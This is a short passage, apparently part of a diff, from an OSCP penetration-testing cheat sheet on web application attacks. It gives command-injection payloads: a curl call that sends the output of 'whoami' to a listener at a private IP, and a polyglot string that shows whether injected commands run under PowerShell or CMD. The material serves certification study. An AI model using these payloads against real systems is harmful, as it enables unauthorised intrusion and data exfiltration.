rodolfomarianocy/OSCP-Tricks-2023/web_application_attacks.md

 curl http://192.168.0.20/$(whoami)
 ```

--> Check if the commands are executed by PowerShell or CMD.
+-> Check if the commands are executed by PowerShell or CMD
 ```
 (dir 2>&1 *`|echo CMD);&<# rem #>echo PowerShell
 ```